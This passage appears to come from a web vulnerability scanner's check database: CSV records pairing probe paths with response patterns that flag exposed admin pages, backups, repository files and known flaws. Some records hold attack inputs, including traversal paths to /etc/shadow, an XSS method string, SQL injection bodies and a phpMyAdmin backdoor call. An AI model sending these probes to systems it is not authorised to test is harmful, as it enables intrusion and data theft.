found.\",\"\",\"\"\n\"006415\",\"\",\"1\",\"@WORDPRESSwp-login/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006416\",\"\",\"1\",\"/xlogin/\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006417\",\"\",\"1\",\"/yonetici.asp\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006418\",\"\",\"1\",\"/yonetici.html\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006419\",\"\",\"1\",\"/yonetici.php\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006420\",\"\",\"1\",\"/yonetim.asp\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006421\",\"\",\"1\",\"/yonetim.html\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006422\",\"\",\"1\",\"/yonetim.php\",\"GET\",\"CODE:200\",\"Admin login page/section found.\",\"\",\"\"\n\"006423\",\"\",\"1\",\"/test.asp\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"006424\",\"\",\"1\",\"/test.aspx\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"006425\",\"\",\"1\",\"/test.php\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"006426\",\"\",\"1\",\"/maintenance.asp\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"006427\",\"\",\"1\",\"/maintenance.aspx\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"006429\",\"\",\"1\",\"/maint/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"006430\",\"\",\"1\",\"/maint.asp\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"006431\",\"\",\"1\",\"/maint.aspx\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"006432\",\"CVE-2009-3733\",\"57\",\"/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/vmware/hostd/vmInventory.xml\",\"GET\",\"CODE:200\",\"VMWare ESX is vulnerable to a directory traversal attack.\",\"\",\"\"\n\"006433\",\"CVE-2007-6203\",\"4\",\"/\",\"<script>alert(1)</script>\",\"CODE:413&&BODY:<script>alert\\(1\\)<\\/script>\",\"Apache HTTP Server 2.0.x and 2.2.x contain an XSS when JavaScript is used as the method\",\"\",\"Content-Length: -1\"\n\"006434\",\"\",\"3\",\"/jk-status\",\"GET\",\"CODE:200\",\"Apache mod_jk status page is visible.\",\"\",\"\"\n\"006435\",\"\",\"3\",\"/balancer-manager\",\"GET\",\"CODE:200\",\"mod_proxy_balancer management page is visible.\",\"\",\"\"\n\"006437\",\"\",\"1\",\"/servlets-examples/\",\"GET\",\"CODE:200\",\"Tomcat servlets examples are visible.\",\"\",\"\"\n\"006438\",\"\",\"1e\",\"/admin-console\",\"GET\",\"CODE:200\",\"JBoss admin console is visible.\",\"\",\"\"\n\"006439\",\"\",\"13\",\"/webmail/src/configtest.php\",\"GET\",\"BODY:SquirrelMail configtest\",\"Squirrelmail configuration test may reveal version and system info.\",\"\",\"\"\n\"006440\",\"\",\"23\",\"@CGIDIRSawstats.pl\",\"GET\",\"BODY:SiteDomain parameter\",\"AWStats logfile analyzer is misconfigured.\",\"\",\"\"\n\"006441\",\"\",\"2\",\"@CGIDIRSawredir.pl\",\"GET\",\"CODE:200\",\"AWStats redirection file.\",\"\",\"\"\n\"006442\",\"\",\"1\",\"/help.php\",\"GET\",\"CODE:200\",\"A help file was found.\",\"\",\"\"\n\"006443\",\"\",\"b\",\"@WORDPRESS\",\"GET\",\"BODY:(?:'|\\\")\\/wp\\-content\\/\",\"A WordPress installation was found.\",\"\",\"\"\n\"006445\",\"http://www.vbulletin.com/forum/showthread.php?357818-Security-Patch-Release-3.8.6-PL1\",\"3\",\"@VBULLETINfaq.php?s=&do=search&q=database&match=all&titlesonly=0\",\"GET\",\"BODY:Database<\\/span> Name:\",\"vBulletin 3.6.8 contains a vulnerability that reveals the database credentials via a FAQ search.\",\"\",\"\"\n\"006447\",\"\",\"2b\",\"/wconnect/admin.html\",\"GET\",\"BODY:e\\-SPS Web\",\"American Software e-SPS admin section found.\",\"\",\"\"\n\"006448\",\"\",\"18\",\"/open.txt\",\"GET\",\"BODY:Fx29ID\",\"Payload for Fx29ID RFI exploit. The server may have been compromised to act as a repository for this file.\",\"\",\"\"\n\"006449\",\"\",\"18\",\"/fx29id1.txt\",\"GET\",\"BODY:Fx29ID\",\"Payload for Fx29ID RFI exploit. The server may have been compromised to act as a repository for this file.\",\"\",\"\"\n\"006450\",\"\",\"18\",\"/fx29id2.txt\",\"GET\",\"BODY:Fx29ID\",\"Payload for Fx29ID RFI exploit. The server may have been compromised to act as a repository for this file.\",\"\",\"\"\n\"006451\",\"\",\"b\",\"/gif/hp_invent_logo.gif\",\"GET\",\"CODE:200\",\"This device may be an HP printer/scanner and allow retrieval of previously scanned images.\",\"\",\"\"\n\"006452\",\"\",\"b\",\"/gif/tricolor_ink_guage.gif\",\"GET\",\"CODE:200\",\"This device may be an HP printer/scanner and allow retrieval of previously scanned images.\",\"\",\"\"\n\"006453\",\"\",\"b1\",\"/logon/logonServlet\",\"GET\",\"BODY:User Management\",\"SAP NetWeaver admin interface found.\",\"\",\"\"\n\"006454\",\"\",\"3\",\"/AdobeDocumentServicesSec/Config/bindings?wsdl&style=http\",\"GET\",\"BODY:><b>\\&nbsp;\\&nbspThe file:&&BODY:does not exist\",\"SAP J2EE server reveals the disk path with certain invalid requests.\",\"\",\"\"\n\"006455\",\"http://ws.apache.org/axis/java/security.html\",\"23\",\"@AXIS2services\",\"GET\",\"BODY:And now\\.\\.\\.\\sSome\\sServices\",\"Apache Axis web services reveals information about all installed web services.\",\"\",\"\"\n\"006456\",\"http://ws.apache.org/axis/java/security.html\",\"23\",\"@AXIS2happyaxis.jsp\",\"GET\",\"BODY:Examining\\swebapp\\sconfiguration&&BODY:<title>Axis\\sHappiness\\sPage<\\/title>\",\"Apache Axis file reveals sensitive information about the Axis installation components.\",\"\",\"\"\n\"006457\",\"\",\"2\",\"/apidocs/index.html\",\"GET\",\"BODY:designed to be viewed using the frames\",\"SAP J2EE Engine help.\",\"\",\"\"\n\"006458\",\"\",\"2\",\"/bcb/bcbadmStart.jsp\",\"GET\",\"BODY:BCB\\-Administration\",\"SAP Business Communication Broker (bcb) may reveal system information and allow configuration.\",\"\",\"\"\n\"006459\",\"\",\"23\",\"/GRMGHeartBeat/HTTPGRMGTest.html\",\"GET\",\"BODY:This is test page for GRMG\",\"SAP GRMG test page.\",\"\",\"\"\n\"006460\",\"\",\"23\",\"/meSync/HttpGRMGTest.html\",\"GET\",\"BODY:This is test page for GRMG\",\"SAP GRMG test page.\",\"\",\"\"\n\"006461\",\"\",\"23\",\"/htmlb/index.html\",\"GET\",\"BODY:HTMLB for Java\",\"SAP HTMLB pages.\",\"\",\"\"\n\"006462\",\"\",\"23\",\"/SQLTrace/index.html\",\"GET\",\"BODY:Welcome to SQLTrace\",\"SAP SQLTrace may disclose sensitive information.\",\"\",\"\"\n\"006463\",\"\",\"23\",\"/TestJDBC_Web/TestJDBCPage.jsp\",\"GET\",\"BODY:Please select a connection\",\"SAP Test JDBC Page may allow unauthorized access to resources or provide detailed errors.\",\"\",\"\"\n\"006464\",\"\",\"23\",\"/uddiclient/jsps/index.jsp\",\"GET\",\"BODY:HTML Business for Java\",\"SAP UDDI Tool is available remotely.\",\"\",\"\"\n\"006465\",\"\",\"b12\",\"/~/index.html\",\"GET\",\"BODY:SAP NetWeaver\",\"SAP NetWeaver default page links to other admin areas.\",\"\",\"\"\n\"006466\",\"\",\"b12\",\"/webdynpro/welcome/Welcome.jsp\",\"GET\",\"BODY:Web Dynpro Welcome\",\"SAP NetWeaver Web Dynpro Tool Applications.\",\"\",\"\"\n\"006467\",\"\",\"b\",\"/sites/\",\"GET\",\"BODY:Plone are now up and running\",\"Zope/Plone were found. Try adding a new site!.\",\"\",\"\"\n\"006468\",\"\",\"0\",\"@FCKEDITOReditor/filemanager/browser/default/frmupload.html\",\"GET\",\"BODY:Upload a new file\",\"FCKeditor could allow files to be updated or edited by remote attackers.\",\"\",\"\"\n\"006469\",\"\",\"23\",\"@FCKEDITORlicense.txt\",\"GET\",\"BODY:Frederico\",\"FCKeditor license file found.\",\"\",\"\"\n\"006470\",\"\",\"1\",\"@FCKEDITORfckconfig.js\",\"GET\",\"BODY:FCKConfig\",\"FCKeditor JavaScript file found.\",\"\",\"\"\n\"006471\",\"\",\"23\",\"@FCKEDITOR_whatsnew.html\",\"GET\",\"BODY:CreateFCKeditor&&BODY:FCKeditor\\sChangeLog\",\"FCKeditor changes file found.\",\"\",\"\"\n\"006472\",\"\",\"0\",\"@FCKEDITOReditor/filemanager/browser/default/browser.html\",\"GET\",\"BODY:Resources Browser\",\"FCKeditor could allow files to be updated or edited by remote attackers.\",\"\",\"\"\n\"006473\",\"\",\"1b\",\"/reportserver/\",\"GET\",\"BODY:Microsoft SQL Server Reporting Services\",\"Microsoft SQL Server Reporting Services\",\"\",\"\"\n\"006474\",\"\",\"2\",\"/j2ee/examples/servlets/\",\"GET\",\"BODY:This is a collection\",\"Oracle j2ee example servlets.\",\"\",\"\"\n\"006475\",\"\",\"2\",\"/j2ee/examples/jsp/\",\"GET\",\"BODY:This is a collection\",\"Oracle j2ee example JSP pages.\",\"\",\"\"\n\"006476\",\"\",\"1\",\"/messages/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"006477\",\"http://tinyurl.com/2f4r2o9\",\"23\",\"@CRYSTALREPORTSviewrpt.cwr?id=1&wid=1&apstoken=127.0.0.2:0\\@111\",\"GET\",\"BODY:Server 127\\.0\\.0\\.2:0 not found\",\"Crystal Reports can be used to scan internal hosts.\",\"\",\"\"\n\"006478\",\"\",\"be\",\"/console-selfservice/\",\"GET\",\"BODY:console header\",\"RSA Self-Service Console found\",\"\",\"\"\n\"006479\",\"\",\"3\",\"@AXIS2axis2-web/HappyAxis.jsp\",\"GET\",\"BODY:Axis2\\sHappiness\\sPage&&BODY:Back\\sHome\",\"Apache Axis2 Happiness Page identified which includes internal application details.\",\"\",\"\"\n\"006480\",\"http://yehg.net/lab/pr0js/advisories/[mybb1.6]_sql_injection\",\"9\",\"/search.php\",\"POST\",\"BODY:MyBB has experienced an internal SQL error and cannot continue\\.&&!BODY:Sorry, but no results were returned\",\"MyBB 1.6 contains an SQL Injection in the keywords parameter of search.php.\",\"action=do_search&forums=2&keywords='+or+'a'+'a&postthread=1\",\"\"\n\"006481\",\"http://yehg.net/lab/pr0js/advisories/[mybb1.6]_sql_injection\",\"9\",\"/private.php\",\"POST\",\"BODY:MyBB has experienced an internal SQL error and cannot continue\\.&&!BODY:Sorry, but no results were returned\",\"MyBBx 1.6 contains an SQL Injection in the keywords parameter of private.php.\",\"my_post_key=&keywords='+or+'a'+'a&quick_search=Search+PMs&allbox=Check+All&fromfid=0&fid=4&jumpto=4&action=do_stuff\",\"\"\n\"006482\",\"\",\"3\",\"/en-GB/debug/sso\",\"GET\",\"BODY:SSO Enabled\",\"Splunk's SSO debug may reveal sensitive info, such as internal IPs/hostnames.\",\"\",\"\"\n\"006483\",\"\",\"3\",\"/en-US/debug/sso\",\"GET\",\"BODY:SSO Enabled\",\"Splunk's SSO debug may reveal sensitive info, such as internal IPs/hostnames.\",\"\",\"\"\n\"006484\",\"\",\"3\",\"/default.htm\",\"GET\",\"BODY:Behind Every Great Web Site\",\"Default EPiServer file found\",\"\",\"\"\n\"006486\",\"https://issues.apache.org/jira/browse/AXIS2-4279,https://www.exploit-db.com/exploits/12721\",\"7\",\"@AXIS2services/Version?xsd=@LFI()\",\"GET\",\"@LFI()\",\"Apache Axis2 contains a directory traversal in the Version program.\",\"\",\"\"\n\"006487\",\"\",\"b\",\"/Util/login.aspx\",\"GET\",\"BODY:EPiServer CMS&&BODY:epi\\-(?:login|button)\",\"EPiServer admin login page found.\",\"\",\"\"\n\"006488\",\"\",\"b\",\"@PHPMYADMINsetup\",\"GET\",\"BODY:index\\.php\\?phpMyAdmin=\",\"phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts. The /setup/ directory may reveal details about the install application and databases.\",\"\",\"\"\n\"006489\",\"\",\"1\",\"/jsp/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"JSP directory has indexing enabled.\",\"\",\"\"\n\"006490\",\"\",\"be\",\"/portal/console/\",\"GET\",\"BODY:function\\sfindTopWindow\",\"Vignette Server admin console located.\",\"\",\"\"\n\"006491\",\"\",\"2abe\",\"/network/cgi/network.cgi\",\"GET\",\"BODY:Network\\sConfiguration\",\"IndigoVision web console access found without authentication.\",\"\",\"\"\n\"006492\",\"\",\"b\",\"/sitefinity/Login.aspx\",\"GET\",\"BODY:checkForIframe\",\"Telerik Sitefinity CMS login found.\",\"\",\"\"\n\"006493\",\"\",\"1\",\"/cms/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"006494\",\"\",\"1\",\"/helpdesk/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"006495\",\"\",\"1b\",\"@PHPMYADMIN\",\"GET\",\"CODE:200&&CODE:401\",\"phpMyAdmin directory found\",\"\",\"\"\n\"006496\",\"\",\"3b\",\"/admin/install/phpinfo.php\",\"GET\",\"BODY:PHP Version\",\"LimeSurvey phpinfo page found. The install directory may contain resetadminpw.php, which will set admin to the default password, likely 'password'. The install directory should be removed.\",\"\",\"\"\n\"006497\",\"\",\"b\",\"/portal/binary/@JUNK(5)/\",\"GET\",\"BODY:Attempt\\smade\\s\\to\\sload\\sunavailable\\sclass\",\"Vignette Server binary loader.\",\"\",\"\"\n\"006498\",\"\",\"bd\",\"/portal/webservice/\",\"GET\",\"BODY:And\\snow\\.\\.\\.\",\"Vignette Server webservices.\",\"\",\"\"\n\"006499\",\"\",\"be\",\"/console/login/LoginForm.jsp\",\"GET\",\"BODY:Log\\sin\\sto\\swork\",\"Oracle WebLogic administrator login found.\",\"\",\"\"\n\"006500\",\"\",\"b3\",\"/home/?vhelp\",\"GET\",\"BODY:Global\\sAvailable\\sMacros\",\"Intuit (diginsite.com) debug mode enabled.\",\"\",\"\"\n\"006501\",\"\",\"b\",\"/servlet/snoopservlet\",\"GET\",\"BODY:Hit Count Demonstration\",\"IBM Websphere SnoopDog example servlet found\",\"\",\"\"\n\"006502\",\"\",\"b\",\"/servlet/hitcount\",\"GET\",\"BODY:Snoop Servlet \\- Request\\/Client Information\",\"IBM Websphere Hit Count example servlet found\",\"\",\"\"\n\"006503\",\"\",\"b\",\"/keepalive.htm\",\"GET\",\"CODE:200&&BODY:Alive!\",\"Weblogic heartbeat page found\",\"\",\"\"\n\"006504\",\"\",\"1b\",\"/Admin/\",\"GET\",\"CODE:200&&BODY:Administration Homepage\",\"Weblogic administration page found\",\"\",\"\"\n\"006505\",\"\",\"23\",\"@AXIS2services/\",\"GET\",\"BODY:have\\sreached\\sthe\\sAXIS\\sHTTP\\sServlet\",\"Apache Axis web services found\",\"\",\"\"\n\"006506\",\"\",\"3\",\"/web.config.bak\",\"GET\",\"BODY:<configuration>&&CODE:200\",\"ASP config backup file is accessible.\",\"\",\"\"\n\"006507\",\"\",\"3\",\"/web.config.back\",\"GET\",\"BODY:<configuration>&&CODE:200\",\"ASP config backup file is accessible.\",\"\",\"\"\n\"006508\",\"\",\"3\",\"/web.config.backup\",\"GET\",\"BODY:<configuration>&&CODE:200\",\"ASP config backup file is accessible.\",\"\",\"\"\n\"006509\",\"\",\"3\",\"/web.config.old\",\"GET\",\"BODY:<configuration>&&CODE:200\",\"ASP config backup file is accessible.\",\"\",\"\"\n\"006510\",\"\",\"3\",\"/web.config.orig\",\"GET\",\"BODY:<configuration>&&CODE:200\",\"ASP config backup file is accessible.\",\"\",\"\"\n\"006511\",\"\",\"3\",\"/web.config~\",\"GET\",\"BODY:<configuration>&&CODE:200\",\"ASP config backup file is accessible.\",\"\",\"\"\n\"006512\",\"\",\"3\",\"/.web.config.swp\",\"GET\",\"BODY:<configuration>&&CODE:200\",\"ASP config backup file is accessible.\",\"\",\"\"\n\"006513\",\"\",\"1\",\"/nn.asp\",\"GET\",\"BODY:File\\sName&&CODE:200\",\"Directory listing program found\",\"\",\"\"\n\"006514\",\"\",\"b3\",\"/munin/index.html\",\"GET\",\"BODY:generated\\sby\\s.*munin&&CODE:200\",\"Munin reveals system information.\",\"\",\"\"\n\"006515\",\"\",\"123\",\"/includes/conexion.inc\",\"GET\",\"BODY:Provider=&&BODY:DRIVER=&&CODE:200\",\"Database connection file found.\",\"\",\"\"\n\"006516\",\"\",\"3b\",\"/errorpage.aspx\",\"GET\",\"BODY:DotNetNuke\\sError:\\s\\-\\sVersion\",\"DotNetNuke reveals the version number in the error page.\",\"\",\"\"\n\"006517\",\"\",\"b\",\"/spin/main.csp\",\"GET\",\"CODE:200&&BODY:iTechnology SPIN\",\"CA iTechnology SPIN interface found\",\"\",\"\"\n\"006518\",\"\",\"b\",\"/openadmin/\",\"GET\",\"CODE:200&&BODY:OpenAdmin Tool\",\"Informix OpenAdmin tool administration login\",\"\",\"\"\n\"006519\",\"\",\"b\",\"@WORDPRESSwp-admin/wp-login.php?action=register\",\"GET\",\"BODY:Register\\sFor\\sThis\\sSite&&!BODY:registration\\sis\\scurrently\\snot\",\"WordPress registration enabled\",\"\",\"\"\n\"006520\",\"\",\"b\",\"@WORDPRESSwp-login.php?action=register\",\"GET\",\"BODY:Register\\sFor\\sThis\\sSite&&!BODY:registration\\sis\\scurrently\\snot\",\"WordPress registration enabled\",\"\",\"\"\n\"006521\",\"http://packetstormsecurity.org/files/109547/tibetsystem-traversal.txt\",\"7\",\"/../../windows/dvr2.ini\",\"GET\",\"BODY:\\[generic\\]\",\"Tibetsystem DVR allows local file retrieval (LFI).\",\"\",\"\"\n\"006522\",\"CVE-2005-1691\",\"7\",\"/htdocs/@LFI()\",\"GET\",\"@LFI()\",\"SAP Internet Graphics Server (IGS) directory traversal\",\"\",\"\"\n\"006523\",\"CVE-2012-1823\",\"38\",\"/?-s\",\"GET\",\"BODY:\\\">\\&lt\\;\\?php&&BODY:<\\?php\",\"PHP allows retrieval of the source code via the -s parameter, and may allow command execution.\",\"\",\"\"\n\"006524\",\"CVE-2012-1823\",\"38\",\"/login.php?-s\",\"GET\",\"BODY:\\\">\\&lt\\;\\?php&&BODY:<\\?php\",\"PHP allows retrieval of the source code via the -s parameter, and may allow command execution.\",\"\",\"\"\n\"006525\",\"\",\"b\",\"@TOMCATADMINhtml\",\"GET\",\"BODY:<tt>conf\\/tomcat\\-users\\.xml<\\/tt>\",\"Default Tomcat Manager / Host Manager interface found\",\"\",\"\"\n\"006526\",\"\",\"b3\",\"/getstatus\",\"GET\",\"BODY:License ID:\",\"Chaos Software V-Ray status information available\",\"\",\"\"\n\"006527\",\"\",\"b\",\"/platform/\",\"GET\",\"BODY:\\.\\.\\/base\\/index\\.jsp\",\"Platform Management Console found\",\"\",\"\"\n\"006528\",\"http://pen-testing.sans.org/blog/pen-testing/2012/12/06/all-your-svn-are-belong-to-us\",\"123\",\"/.svn/entries\",\"GET\",\"CODE:200\",\"Subversion Entries file may contain directory listing information.\",\"\",\"\"\n\"006529\",\"https://www.sans.org/blog/all-your-svn-are-belong-to-us/\",\"123\",\"/.svn/wc.db\",\"GET\",\"BODY:_autoindex\",\"Subversion SQLite DB file may contain directory listing information.\",\"\",\"\"\n\"006530\",\"\",\"123\",\"/.git/index\",\"GET\",\"CODE:200\",\"Git Index file may contain directory listing information.\",\"\",\"\"\n\"006531\",\"\",\"123\",\"/.hg/dirstate\",\"GET\",\"CODE:200\",\"Mercurial DirState file may contain directory listing information.\",\"\",\"\"\n\"006532\",\"\",\"1\",\"/test.jsp\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"006533\",\"\",\"1b\",\"/em\",\"GET\",\"BODY:Oracle Enterprise Manager\",\"Oracle Application Server oc4j admin page found.\",\"\",\"\"\n\"006554\",\"\",\"1b\",\"/oam/\",\"GET\",\"BODY:Oracle Access Manager\",\"Oracle Applications portal pages found.\",\"\",\"\"\n\"006555\",\"CVE-2015-3035 https://websec.ca/publication/advisories/path-traversal-vulnerability-tplink-wdr740\",\"7\",\"/help/../../../../../../../../../../../../../../../../etc/shadow\",\"GET\",\"@LFI()\",\"TP-Link wireless routers directory traversal.\",\"\",\"\"\n\"006556\",\"\",\"3b\",\"/snoop/\",\"GET\",\"BODY:Request Information\",\"WebSphere snoop servlet information disclosure.\",\"\",\"\"\n\"006557\",\"\",\"3b\",\"/web-console/ServerInfo.jsp\",\"GET\",\"BODY:Version Name\",\"JBoss Application Server information available .\",\"\",\"\"\n\"006558\",\"\",\"3b\",\"/otrs/installer.pl\",\"GET\",\"BODY:OTRS\\sProject\",\"OTRS installer application found\",\"\",\"\"\n\"006559\",\"\",\"3b\",\"/reaction/RSTest.htm\",\"GET\",\"BODY:ReAction Server Test Page\",\"ReAction Server test page is installed, this may reveal environmental information\",\"\",\"\"\n\"006597\",\"\",\"3b\",\"/WorkArea/version.xml\",\"GET\",\"BODY:<installation>\",\"Ektron CMS version information\",\"\",\"\"\n\"006598\",\"\",\"23\",\"@WORDPRESSwp-content/debug.log\",\"GET\",\"BODY:PHP\\sNotice&&BODY:PHP\\sWarn\",\"PHP debug log found\",\"\",\"\"\n\"006599\",\"\",\"23\",\"/mobileadmin/db/MobileAdminDB.sqlite\",\"GET\",\"CODE:200\",\"RoveIT Mobile Admin internal database is available for download\",\"\",\"\"\n\"006600\",\"\",\"b\",\"/mobileadmin/\",\"GET\",\"BODY:SolarWinds\\sWorldwide\",\"RoveIT Mobile Admin internal database is available for download\",\"\",\"\"\n\"006601\",\"http://seclists.org/fulldisclosure/2012/Sep/21\",\"c\",\"/WorkArea/upload.aspx\",\"GET\",\"BODY:EktronJQuery\\.js\",\"Ektron CMS file uploader.\",\"\",\"\"\n\"006602\",\"http://seclists.org/fulldisclosure/2012/Sep/21\",\"c\",\"/WorkArea/Blogs/xmlrpc.aspx\",\"GET\",\"BODY:<error>1<\\/error>\",\"Ektron CMS may be vulnerable to XXE injection.\",\"\",\"\"\n\"006603\",\"\",\"1b\",\"/mobileadmin/web/\",\"GET\",\"BODY:showLoadingScreen\",\"RoveIT Mobile Admin Windows login\",\"\",\"\"\n\"006605\",\"\",\"1b\",\"/mobileadmin/logs/\",\"GET\",\"BODY:Directory\\sListing\",\"RoveIT Mobile logs accessible\",\"\",\"\"\n\"006606\",\"\",\"1b\",\"/mobileadmin/bin/\",\"GET\",\"BODY:Directory\\sListing\",\"RoveIT Mobile executable dir accessible\",\"\",\"\"\n\"006607\",\"\",\"3\",\"/mobileadmin/home.cs\",\"GET\",\"BODY:Server\\sVersion\",\"RoveIT Mobile gives a list of a server's Windows domains\",\"\",\"\"\n\"006608\",\"https://www.phpmyadmin.net/security/PMASA-2012-5/\",\"8\",\"@PHPMYADMINserver_sync.php?c=phpinfo()\",\"GET\",\"BODY:PHP\\sVersion\",\"phpMyAdmin contains a backdoor which allows remote PHP execution.\",\"\",\"\"\n\"006609\",\"\",\"23\",\"/.git/HEAD\",\"GET\",\"BODY:ref:\\srefs\",\"Git HEAD file found. Full repo details may be present.\",\"\",\"\"\n\"006610\",\"\",\"23\",\"/.bzr/branch-format\",\"GET\",\"BODY:Bazaar\\-NG\\smeta\",\"Bazaar file found. Full repo details may be present.\",\"\",\"\"\n\"006611\",\"\",\"23\",\"/.hg/requires\",\"GET\",\"BODY:revlogv\",\"Mercurial (HG) file found. Full repo details may be present.\",\"\",\"\"\n\"006612\",\"\",\"3\",\"/troubleshooting_logs.txt\",\"GET\",\"BODY:dhcpd:\",\"Arris Touchstone log file available without authentication.\",\"\",\"\"\n\"006613\",\"\",\"23\",\"/caucho-status\",\"GET\",\"BODY:Caucho\\sServlet\\sEngine\",\"Caucho Resin status file present\",\"\",\"\"\n\"006614\",\"https://seclists.org/fulldisclosure/2012/Dec/242\",\"23\",\"@WORDPRESSwp-content/w3tc/dbcache/\",\"GET\",\"BODY:(?i)index\\sof\\s\\/\",\"W3 Total Cache reveals sensitive information.\",\"\",\"\"\n\"006615\",\"\",\"b\",\"@WORDPRESSwp-content/plugins/portable-phpmyadmin/wp-pma-mod/\",\"GET\",\"BODY:<title>phpMyAdmin\",\"phpMyAdmin (portable) found.\",\"\",\"\"\n\"006616\",\"\",\"23\",\"@WORDPRESSwp-content/plugins/portable-phpmyadmin/wp-pma-mod/db_sql.php\",\"GET\",\"BODY:browse\\\">Browse\",\"phpMyAdmin (portable) found which may allow DB access.\",\"\",\"\"\n\"006617\",\"\",\"23\",\"@WORDPRESSwp-content/uploads/dump.sql\",\"GET\",\"BODY:WordPress\\sMySQL\\sdatabase\",\"A WordPress MySQL database dump was found.\",\"\",\"\"\n\"006618\",\"\",\"23\",\"@WORDPRESSwp-content/plugins/pods/sql/dump.sql\",\"GET\",\"BODY:CREATE\\sTABLE&&BODY:INSERT\\sINTO\",\"A WordPress MySQL database dump was found.\",\"\",\"\"\n\"006619\",\"\",\"23\",\"@WORDPRESSwp-content/plugins/simplemap/dump.sql\",\"GET\",\"BODY:CREATE\\sTABLE&&BODY:INSERT\\sINTO\",\"A WordpPess MySQL database dump was found.\",\"\",\"\"\n\"006620\",\"\",\"23\",\"@WORDPRESSwp-content/plugins/simplemap/classes/error_log\",\"GET\",\"BODY:PHP\\sFatal\\serror\",\"WordPress Simplemap error log found.\",\"\",\"\"\n\"006621\",\"\",\"23\",\"@WORDPRESSwp-content/plugins/emailbuddy/db.sql\",\"GET\",\"BODY:CREATE\\sTABLE&&BODY:INSERT\\sINTO\",\"A WordPress MySQL database dump was found.\",\"\",\"\"\n\"006622\",\"\",\"2\",\"@WORDPRESSwp-content/uploads/\",\"GET\",\"BODY:(?i)index\\sof\\s\\/\",\"WordPress uploads directory is browsable. This may reveal sensitive information\",\"\",\"\"\n\"006623\",\"\",\"23\",\"@WORDPRESSwp-content/uploads/\",\"GET\",\"BODY:(?i)index\\sof\\s\\/&&BODY:temp_[a-z0-9]+\",\"WordPress uploads directory is browsable may contain database dumps in the 'temp_*' directory.\",\"\",\"\"\n\"006624\",\"\",\"23\",\"@WORDPRESSwp-content/plugins/wpmu-dev-post-votes/db.sql\",\"GET\",\"BODY:CREATE\\sTABLE&&BODY:INSERT\\sINTO\",\"A WordPress MySQL database dump was found.\",\"\",\"\"\n\"006625\",\"\",\"23\",\"@WORDPRESSwp-content/plugins/wpvotes/db.sql\",\"GET\",\"BODY:CREATE\\sTABLE&&BODY:INSERT\\sINTO\",\"A WordPress MySQL database dump was found.\",\"\",\"\"\n\"006626\",\"\",\"23\",\"@WORDPRESSwp-content/plugins/post-voting/db.sql\",\"GET\",\"BODY:CREATE\\sTABLE&&BODY:INSERT\\sINTO\",\"A WordPress MySQL database dump was found.\",\"\",\"\"\n\"006627\",\"CVE-2012-2922\",\"3\",\"/?q[]=x\",\"GET\",\"BODY:(trim|explode|preg_match|stristr)\\(\\)\\sexpects\\sparameter&&BODY:Array\\sto\\sstring\",\"Drupal 7 contains a path information disclosure.\",\"\",\"\"\n\"006628\",\"\",\"3\",\"/whoami.php\",\"GET\",\"BODY:php\\sis\\srunning\\sas\",\"Whoami.php reveals the web server user.\",\"\",\"\"\n\"006629\",\"http://www.troyhunt.com/2012/01/aspnet-session-hijacking-with-google.html\",\"23\",\"/elmah.axd\",\"GET\",\"BODY:Error\\sLog\\sfor&&BODY:Atif\\sAziz\",\"elmah.axd reveals application log details.\",\"\",\"\"\n\"006630\",\"\",\"b\",\"/SAFileUpDocs/whnjs.htm\",\"GET\",\"BODY:<title>SoftArtisans FileUp 5\\.0<\\/title>\",\"SoftArtisans FileUp help documentation found.\",\"\",\"\"\n\"006631\",\"\",\"b\",\"/SAFileUpSamples/\",\"GET\",\"BODY:FileUp v5 Code Sample Index\",\"SoftArtisans FileUp samples found, these may allowed file uploads.\",\"\",\"\"\n\"006633\",\"\",\"3\",\"/cgi-bin/status_cgi\",\"GET\",\"BODY:Touchstone\\sStatus\",\"Arris Touchstone status program reveals potentially sensitive information.\",\"\",\"\"\n\"006634\",\"\",\"2\",\"/docs/\",\"GET\",\"BODY:Apache Tomcat&&BODY:<h2>Documentation Index<\\/h2>\",\"Tomcat Documentation found\",\"\",\"\"\n\"006635\",\"\",\"013\",\"/sites/all/libraries/tinymce/examples/\",\"GET\",\"BODY:example\\susing\\sjQuery&&BODY:TinyMCE\\sexamples\",\"Drupal install of TinyMCE examples found, check for file uploads.\",\"\",\"\"\n\"006636\",\"\",\"1\",\"/notes.txt\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"006637\",\"\",\"1\",\"/httpd.conf\",\"GET\",\"BODY:configuration\\sfile&&CODE:200\",\"Apache httpd.conf configuration file\",\"\",\"\"\n\"006638\",\"\",\"1\",\"/httpd.conf.bak\",\"GET\",\"BODY:configuration\\sfile&&CODE:200\",\"Apache httpd.conf configuration file\",\"\",\"\"\n\"006639\",\"\",\"1\",\"/sites/default/files/backup_migrate/\",\"GET\",\"BODY:index\\sof\",\"Drupal database backups available\",\"\",\"\"\n\"006640\",\"\",\"1\",\"/sites/default/files/simpletest/verbose/ContentAccessModuleTestCase-2.html\",\"GET\",\"BODY:POST\\srequest\\sto\",\"Drupal simpletest plugin has test cases available, may leak a 